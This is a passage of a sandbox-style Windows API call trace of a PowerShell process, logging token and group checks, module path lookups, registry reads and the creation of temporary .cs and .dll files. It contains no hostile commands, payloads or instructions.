TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4ebd938 | out: TokenInformation=0x0, ReturnLength=0x4ebd938) returned 0 [0090.558] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x42731a8 [0090.558] GetTokenInformation (in: TokenHandle=0x500, TokenInformationClass=0x8, TokenInformation=0x42731a8, TokenInformationLength=0x4, ReturnLength=0x4ebd938 | out: TokenInformation=0x42731a8, ReturnLength=0x4ebd938) returned 1 [0090.558] LocalFree (hMem=0x42731a8) returned 0x0 [0090.558] DuplicateTokenEx (in: hExistingToken=0x500, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x4ebd940 | out: phNewToken=0x4ebd940*=0x504) returned 1 [0090.558] CheckTokenMembership (in: TokenHandle=0x504, SidToCheck=0x641e720*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x4ebd950 | out: IsMember=0x4ebd950) returned 1 [0090.558] CloseHandle (hObject=0x504) returned 1 [0090.564] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebd6dc | out: lpPerformanceCount=0x4ebd6dc*=1641338077477) returned 1 [0090.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd3c8) returned 1 [0090.565] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x4ebd68c | out: lpFileInformation=0x4ebd68c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0090.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd3c4) returned 1 [0090.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd35c) returned 1 [0090.565] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x4ebd620 | out: lpFileInformation=0x4ebd620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0090.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd358) returned 1 [0090.565] CoTaskMemAlloc (cb=0x10) returned 0x425e628 [0090.566] CoTaskMemAlloc (cb=0x10) returned 0x425e988 [0090.566] CoTaskMemAlloc (cb=0xe4) returned 0x33cef8 [0090.566] CoTaskMemAlloc (cb=0x30) returned 0x4248690 [0090.566] WinVerifyTrust () returned 0x800b0100 [0090.580] CoTaskMemFree (pv=0x425e628) [0090.580] CoTaskMemFree (pv=0x4248690) [0090.580] CryptCATHandleFromStore () returned 0x2bfe38 [0090.581] WTHelperGetProvSignerFromChain () returned 0x0 [0090.581] CoTaskMemAlloc (cb=0x10) returned 0x425e628 [0090.581] CoTaskMemAlloc (cb=0x30) returned 0x4248690 [0090.581] WinVerifyTrust () returned 0x0 [0090.581] CoTaskMemFree (pv=0x4248690) [0090.581] CoTaskMemFree (pv=0x425e628) [0090.581] CoTaskMemFree (pv=0x33cef8) [0090.581] CoTaskMemFree (pv=0x425e988) [0090.586] CoCreateGuid (in: pguid=0x4ebd5b8 | out: pguid=0x4ebd5b8*(Data1=0x2322b564, Data2=0x3260, Data3=0x4edf, Data4=([0]=0xa1, [1]=0x67, [2]=0x86, [3]=0x56, [4]=0x0, [5]=0x8a, [6]=0x5, [7]=0x13))) returned 0x0 [0090.587] CoCreateGuid (in: pguid=0x4ebd5b8 | out: pguid=0x4ebd5b8*(Data1=0x551efed6, Data2=0xf4bf, Data3=0x452b, Data4=([0]=0x8e, [1]=0xbd, [2]=0x3c, [3]=0x50, [4]=0x6e, [5]=0x7, [6]=0x25, [7]=0x24))) returned 0x0 [0090.587] CoCreateGuid (in: pguid=0x4ebd5b8 | out: pguid=0x4ebd5b8*(Data1=0xd851db6e, Data2=0x8b30, Data3=0x4985, Data4=([0]=0xa7, [1]=0x6, [2]=0x5f, [3]=0xbd, [4]=0x1, [5]=0x78, [6]=0xc0, [7]=0xec))) returned 0x0 [0090.587] CoCreateGuid (in: pguid=0x4ebd5b8 | out: pguid=0x4ebd5b8*(Data1=0x9ca0f407, Data2=0x9d71, Data3=0x4947, Data4=([0]=0x8b, [1]=0xc7, [2]=0x9f, [3]=0xe2, [4]=0x6a, [5]=0x54, [6]=0x8c, [7]=0xae))) returned 0x0 [0090.590] CoCreateGuid (in: pguid=0x4ebd5b8 | out: pguid=0x4ebd5b8*(Data1=0x2f7c23a8, Data2=0xab7, Data3=0x4eab, Data4=([0]=0xae, [1]=0x3, [2]=0x89, [3]=0xf7, [4]=0xfb, [5]=0xc3, [6]=0xcb, [7]=0x5a))) returned 0x0 [0090.590] CoCreateGuid (in: pguid=0x4ebd5b8 | out: pguid=0x4ebd5b8*(Data1=0x686ce901, Data2=0x98af, Data3=0x4edf, Data4=([0]=0x8a, [1]=0x37, [2]=0x8f, [3]=0x7e, [4]=0x54, [5]=0x1c, [6]=0x7, [7]=0xba))) returned 0x0 [0090.691] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.691] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.691] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x6441ccc, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.692] RegCloseKey (hKey=0x500) returned 0x0 [0090.692] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.692] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.692] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x6441fe0, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.692] RegCloseKey (hKey=0x500) returned 0x0 [0090.693] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.693] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.693] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x64422dc, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.693] RegCloseKey (hKey=0x500) returned 0x0 [0090.693] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.693] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.693] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x64425e4, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.693] RegCloseKey (hKey=0x500) returned 0x0 [0090.694] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.694] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.694] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x6442904, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.694] RegCloseKey (hKey=0x500) returned 0x0 [0090.695] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.695] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.695] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x6442c18, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.695] RegCloseKey (hKey=0x500) returned 0x0 [0090.695] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.696] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.696] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x6442f14, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.696] RegCloseKey (hKey=0x500) returned 0x0 [0090.697] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe95c | out: phkResult=0x4ebe95c*=0x500) returned 0x0 [0090.697] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe97c, lpData=0x0, lpcbData=0x4ebe978*=0x0 | out: lpType=0x4ebe97c*=0x1, lpData=0x0, lpcbData=0x4ebe978*=0x56) returned 0x0 [0090.697] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe97c, lpData=0x644325c, lpcbData=0x4ebe978*=0x56 | out: lpType=0x4ebe97c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe978*=0x56) returned 0x0 [0090.697] RegCloseKey (hKey=0x500) returned 0x0 [0090.854] EtwEventActivityIdControl () returned 0x0 [0090.855] SetEvent (hEvent=0x4fc) returned 1 [0090.855] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x4ebecb8*=0x4fc, lpdwindex=0x4ebeadc | out: lpdwindex=0x4ebeadc) returned 0x0 [0090.857] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebec60, nSize=0xbc | out: lpBuffer="") returned 0x0 [0090.859] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0090.860] GetFileType (hFile=0xb) returned 0x2 [0090.861] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x4ebedf0 | out: lpMode=0x4ebedf0) returned 1 [0090.862] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x4ebedb0 | out: lpConsoleScreenBufferInfo=0x4ebedb0) returned 1 [0090.862] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x4ebedb0 | out: lpConsoleScreenBufferInfo=0x4ebedb0) returned 1 [0090.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0090.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0090.954] EtwEventActivityIdControl () returned 0x0 [0090.954] EtwEventActivityIdControl () returned 0x0 [0090.954] EtwEventActivityIdControl () returned 0x0 [0091.064] GetCurrentProcess () returned 0xffffffff [0091.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebed04 | out: TokenHandle=0x4ebed04*=0x500) returned 1 [0091.073] GetCurrentProcess () returned 0xffffffff [0091.073] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebecc8 | out: TokenHandle=0x4ebecc8*=0x504) returned 1 [0091.074] GetCurrentProcess () returned 0xffffffff [0091.074] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebecd8 | out: TokenHandle=0x4ebecd8*=0x508) returned 1 [0091.074] CloseHandle (hObject=0x504) returned 1 [0091.076] CoTaskMemAlloc (cb=0x20c) returned 0x4277c60 [0091.076] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x4277c60 | out: lpBuffer="C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\") returned 0x25 [0091.076] CoTaskMemFree (pv=0x4277c60) [0091.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x26 [0091.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\", nBufferLength=0x26, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x25 [0091.076] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\", lpszLongPath=0x4265bc8, cchBuffer=0x26 | out: lpszLongPath="C:\\Users\\5AlR3U30D3\\AppData\\Local\\mp\\") returned 0x28 [0091.078] LocalReAlloc (hMem=0x4265bc8, uBytes=0x50, uFlags=0x2) returned 0x4265bc8 [0091.078] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\", lpszLongPath=0x4265bc8, cchBuffer=0x28 | out: lpszLongPath="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\") returned 0x27 [0091.088] GetTokenInformation (in: TokenHandle=0x508, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4ebeca8 | out: TokenInformation=0x0, ReturnLength=0x4ebeca8) returned 0 [0091.089] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x42731c8 [0091.089] GetTokenInformation (in: TokenHandle=0x508, TokenInformationClass=0x8, TokenInformation=0x42731c8, TokenInformationLength=0x4, ReturnLength=0x4ebeca8 | out: TokenInformation=0x42731c8, ReturnLength=0x4ebeca8) returned 1 [0091.089] LocalFree (hMem=0x42731c8) returned 0x0 [0091.089] DuplicateTokenEx (in: hExistingToken=0x508, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x4ebecb0 | out: phNewToken=0x4ebecb0*=0x504) returned 1 [0091.089] CheckTokenMembership (in: TokenHandle=0x504, SidToCheck=0x6464cb4*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x4ebecc0 | out: IsMember=0x4ebecc0) returned 1 [0091.089] CloseHandle (hObject=0x504) returned 1 [0091.090] GetTokenInformation (in: TokenHandle=0x508, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4ebecf4 | out: TokenInformation=0x0, ReturnLength=0x4ebecf4) returned 0 [0091.090] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x4266220 [0091.090] GetTokenInformation (in: TokenHandle=0x508, TokenInformationClass=0x1, TokenInformation=0x4266220, TokenInformationLength=0x24, ReturnLength=0x4ebecf4 | out: TokenInformation=0x4266220, ReturnLength=0x4ebecf4) returned 1 [0091.091] LocalFree (hMem=0x4266220) returned 0x0 [0091.099] ConvertStringSecurityDescriptorToSecurityDescriptorW (in: StringSecurityDescriptor="D:(D;OI;SD;;;S-1-5-21-3683305739-1236715609-858405165-1000)(A;OICI;FA;;;BA)S:(ML;OI;NW;;;HI)", StringSDRevision=0x1, SecurityDescriptor=0x4ebecec, SecurityDescriptorSize=0x0 | out: SecurityDescriptor=0x4ebecec*=0x0*(Revision=0x1, Sbz1=0x0, Control=0x8014, Owner=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x14), Group=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x14, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x30), Sacl=0x14*(AclRevision=0x14, Sbz1=0x0, AclSize=0x0, AceCount=0x30, Sbz2=0x0), Dacl=0x30*(AclRevision=0x30, Sbz1=0x0, AclSize=0x0, AceCount=0x2, Sbz2=0x1c)), SecurityDescriptorSize=0x0) returned 1 [0091.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", cchWideChar=47, lpMultiByteStr=0x4ebec68, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", lpUsedDefaultChar=0x0) returned 47 [0091.105] CreateDirectoryA (lpPathName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj"), lpSecurityAttributes=0x4ebec5c) returned 1 [0091.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0091.107] LocalReAlloc (hMem=0x4265bc8, uBytes=0x72, uFlags=0x2) returned 0x4265bc8 [0091.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj", nBufferLength=0x39, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj", lpFilePart=0x0) returned 0x38 [0091.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0091.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj", nBufferLength=0x39, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj", lpFilePart=0x0) returned 0x38 [0091.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0091.107] LocalReAlloc (hMem=0x4265bc8, uBytes=0x7a, uFlags=0x2) returned 0x4265bc8 [0091.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp", lpFilePart=0x0) returned 0x3c [0091.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebec5c) returned 1 [0091.108] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x504 [0091.108] GetFileType (hFile=0x504) returned 0x1 [0091.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebec58) returned 1 [0091.108] GetFileType (hFile=0x504) returned 0x1 [0091.108] CloseHandle (hObject=0x504) returned 1 [0091.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0091.110] LocalReAlloc (hMem=0x4265bc8, uBytes=0x7c, uFlags=0x2) returned 0x4265bc8 [0091.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs", nBufferLength=0x3e, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs", lpFilePart=0x0) returned 0x3d [0091.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeca8) returned 1 [0091.110] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.0.cs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x504 [0091.110] GetFileType (hFile=0x504) returned 0x1 [0091.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeca4) returned 1 [0091.111] GetFileType (hFile=0x504) returned 0x1 [0091.111] WriteFile (in: hFile=0x504, lpBuffer=0x6466d7c*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x4ebed14, lpOverlapped=0x0 | out: lpBuffer=0x6466d7c*, lpNumberOfBytesWritten=0x4ebed14*=0x1d4, lpOverlapped=0x0) returned 1 [0091.113] CloseHandle (hObject=0x504) returned 1 [0091.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0091.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", lpFilePart=0x0) returned 0x3c [0091.116] SetThreadErrorMode 